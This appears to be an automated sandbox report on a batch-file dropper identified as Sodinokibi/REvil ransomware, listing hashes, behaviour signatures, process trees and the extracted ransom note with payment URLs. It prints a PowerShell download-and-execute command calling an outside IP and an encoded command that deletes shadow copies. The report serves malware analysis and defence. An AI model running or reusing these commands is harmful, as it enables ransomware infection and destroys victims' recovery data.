Analysis

  • max time kernel
    141s
  • max time network
    55s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    21-07-2020 03:10

General

  • Target

    c9af7ca3680a5a25e788062683cc93b4.bat

  • Size

    219B

  • MD5

    dc0a4c0f80db22d5242cb4addeaa91f8

  • SHA1

    ac411eca6ffc942efad96a63d86307d77c9f0c2f

  • SHA256

    7de87ff14574bfdf6858a7cf58f8dad6ba484c372a9d5f4b4e3b6a4824d1a40a

  • SHA512

    ab01868327fdc22ac891fe45261dfa8f737060c5c797fd42296bb71b546f82d84bba3114be6c37b35dd17621dd0f953ecd53191c9664864e9aae983493117e5c

Malware Config

Extracted

  • Language
    ps1
  • Source
    URLs
  • ps1.dropper
    http://185.103.242.78/pastes/c9af7ca3680a5a25e788062683cc93b4

Extracted

Path

C:\y5h61s8orj-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension y5h61s8orj. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D2D55285718AB8B9 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/D2D55285718AB8B9 Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: t1DWc3bRapKeISLXJPAH1I9jxxdQTe9klRqgM8nlB+PcK5iw0xGuJGCF+2myFU03 Evntfy8GJixLem1Iy7oqxr6iFee3VVfw8P3HpWWNwjFvSzdo/IWCAHbuyHwQlbqA om5FyQ/fxxHbblFSO18HkP9mh3k21SWnghFJBLZkHwCI0WXgKeAa5gVJRBag2lgu 4LdyjOy6Gza+DpPcH8ByHH6FJd9mfp8KJbcJHTP+c8uMY+a7VwhN9U5SaavDjBym qZn0RQf7Mpk0squoVz0MNjGDkn/WaVFGM25ShSG8wI8mSjRDsr6cuVDebd+6sxw1 6dKNRH7s+kkYvTGwef0qbJHW6+emZ2PonDUpUe3xhPBHCOdhq0eCgzfQs4+iKpeF XY8vY9X1xmIhzA8mwh2PKHm2hq0UPxXzD/8ycNIeE4Iln2uC53CDyUpDmeWdyGrK /YIh7j90mvuPUTPjoXonIU9nHdB6ZW9LcJnl8JCP/f0P32Bd7JwMOJvoX+2Fdy+N whGIp8wo+eEnDrjnQ4LmrPqBbUkYAwtjvPuzO3N2kGAJkfuVPN97j2VoY1MGb/4B KdWHXvLoMcmTTacPuXvAdp20EhlMNucpnSE3iVgYfUGQWZwrg6edapOQRRfWZvTA lDD6szeVH2rFQWNV28IbDF/g/EgPz83zSoDXpxZP2E1DcAU7Es9vPbNp/XYRCQOf Xoo7zCt1i2bar9lP57asgqzEFum4Nb03G4N28z7TjS5maCAPH8OWmYHvP70FNWjQ /xUyXvWu9FXFoFKU4uapMzpOPdkUdazOeesihj+eOPKwYRxAmLGudSPrf3tvcXrH 7ivsxyo+JoQ4mLDpcbFOrkAEeIZir8kPtukjb1TJbhne/7YbSNtlp5mr/4equS4T lfmxMf8htRjoLc86h0MLSJshTZAG2iQ0zJsHcWSjQQnL+Os8J+m+FPIgsjJV5S7D +YcV5SLR+Ofo9c74RwHFouX6N/PMKQA0q/rtAeW0FSOoRHG8lBt5v4kxt3iBxHt8 S6RLYy6R9UVnltIECNtKMXgwtMCH6dHtVNydHDKKZw6qC9Uw1C7N99yFrz7v+rAb PdFCyxahXp4YIkHonhY5egnXU2K38GSH7dTDEQpztjJqYoqOyb407tGK/8RfHFuV vCByFuXG1jKUAXilIZDGpJ0t5jOr24vSLGANRMG2lCd+bieCGMRn6MOota1PZLiZ nnTsYbc+TkKmvrf92EmPOLPP7BEFcx4reAefuVgazuFMLgKAAEGv+FsinIR703mC xgUF/f9GcF+qKnQJZSIRQHpQUn7rcRD/I0waoItLwwWGfAY288S5bw== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D2D55285718AB8B9

http://decryptor.cc/D2D55285718AB8B9

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Drops file in Program Files directory 20 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\c9af7ca3680a5a25e788062683cc93b4.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:828
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c9af7ca3680a5a25e788062683cc93b4');Invoke-NZFRVEJKWUXV;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      PID:1388
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1504
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:740

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

  • memory/1388-0-0x0000000000000000-mapping.dmp

  • memory/1388-14-0x0000000008FE0000-0x0000000009365000-memory.dmp

    Filesize

    3.5MB

  • memory/1504-3-0x0000000000000000-mapping.dmp